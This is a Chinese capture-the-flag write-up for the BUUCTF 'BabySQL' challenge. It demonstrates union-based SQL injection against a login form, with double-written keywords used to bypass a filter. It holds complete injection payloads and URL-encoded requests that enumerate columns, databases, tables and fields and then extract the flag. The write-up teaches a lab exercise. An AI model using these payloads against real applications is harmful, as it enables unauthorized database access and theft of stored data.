buuctf[极客大挑战 2019]BabySQL--联合注入、双写过滤

目录

1、测试万能密码:

2、判断字段个数

3、尝试联合注入

4、尝试双写过滤

5、继续尝试列数

6、查询数据库和版本信息

7、查询表名

8、没有找到和ctf相关的内容,查找其他的数据库

9、查看ctf数据库中的表

10、查询Flag表中的字段名

11、查询表中的内容


1、测试万能密码:

1' or'1'='1 失败

2、判断字段个数

1' order by 3# "or"和"by"被过滤

3、尝试联合注入

Payload:1'union select 1#&password=1

url:username=1'union+select+1&password=aa

有回显: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1#' and password='1'' at line 1

union和select被过滤

4、尝试双写过滤

Payload :username=1'ununionion seselectlect 1#&password=1

url:username=1%27ununionion%20seselectlect%201%23&password=1

有回显: The used SELECT statements have a different number of columns

使用的SELECT语句具有不同数量的列

5、继续尝试列数

Payload:

username=1'ununionion seselectlect 1,2,3#&password=1

Url:

username=1%27ununionion%20seselectlect%201,2,3%23&password=1

有回显登录成功

说明正确的列数为三列

6、查询数据库和版本信息

Payload:

username=1'ununionion seselectlect 1,version(),database()#&password=1

Url:

username=1%27ununionion%20seselectlect%201,version(),database()%23&password=1

有回显:版本为:" 10.3.18-MariaDB! "

数据库为:"geek"

7、查询表名

Payload:

username=1'ununionion seselectlect 1,group_concat(table_name),3 from information_schema.t

ables where table_schema=database()#&password=1

或者

username=1'ununionion seselectlect 1,group_concat(table_name),3 from information_schema.t

ables where table_schema='geek'#&password=1

Url:

对from,or,where进行了过滤,所以需要进行双写过滤

username=1%27ununionion%20seselectlect%201,group_concat(table_name),3%20ffromrom %20infoorrmation _schema.tables%20wwherehere%20table_schema=database()%23&password=1

username=1%27ununionion%20seselectlect%201,group_concat(table_name),3%20ffromrom %20infoorrmation _schema.tables%20wwherehere%20table_schema=%27geek%27%23&password=1

有回显获得表名b4bsql,geekuser!

8、没有找到和ctf相关的内容,查找其他的数据库

Payload:

username=1'ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_

schema.schemata#&password=1

Url:

username=1%27ununionion%20seselectlect%201,2,group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%23&password=1

有回显

9、查看ctf数据库中的表

Payload:

username=1'ununionion seselectlect 1,group_concat(table_name),3 from information_schema.t

ables where table_schema='ctf'#&password=1

URL:

username=1%27ununionion%20seselectlect%201,group_concat(table_name),3%20ffromrom %20infoorrmation _schema.tables%20wwherehere%20table_schema=%27ctf%27%23&password=1

有回显,存在表flag

10、查询Flag表中的字段名

Payload:

username=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorr

mation_schema.columns whwhereere table_schema='ctf'#&password=1

Url:

username=1%27%20ununionion%20seselectlect%201,2,group_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema=%27ctf%27%23&password=1

有回显,字段名为flag

11、查询表中的内容

Payload:

username=1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#&password=1

Url:

username=1%27%20ununionion%20seselectlect%201,2,group_concat(flag)%20frfromom%20ctf.Flag%23&password=1

获得flag

参考内容:sql注入之union联合注入_在用户名的输入框中,通过union查询语句,猜测出前面表查询的列数。【查找注入点】-CSDN博客

相关推荐
先吃饱再说5 小时前
存储的进化:从 MySQL 到浏览器缓存,数据到底住在哪?
数据库
Nturmoils5 小时前
字段太多看不全,ksql 的展开模式和输出控制怎么用
数据库·后端
Databend7 小时前
Agent 轨迹分析与归因的数据工程实践
大数据·数据库·agent
这个DBA有点耶8 小时前
SQL改写进阶:标量子查询的“隐形代价”与消除实战
数据库·mysql·架构
smallyoung9 小时前
数据库乐观锁深度解析:MySQL、PostgreSQL 实战 + Spring Boot 集成指南
数据库·mysql·postgresql
parade岁月9 小时前
MySQL JOIN解析:朴实无华但食之有味
数据库·后端
用户3169353811839 小时前
MySQL服务无法启动问题解决全记录
数据库
vivo互联网技术13 小时前
从 10 分钟到 1 秒:ES 深度分页任意跳页的三轮优化实战
服务器·数据库·redis·elasticsearch·深度分页
倔强的石头_1 天前
《Kingbase护城河》——猎捕慢查询:执行计划的微观解析与索引调优实战
数据库
SelectDB1 天前
Apache Doris Python UDF:让 SQL 直接调用 Python 生态,支撑 Agent 时代复杂业务逻辑
大数据·数据库·python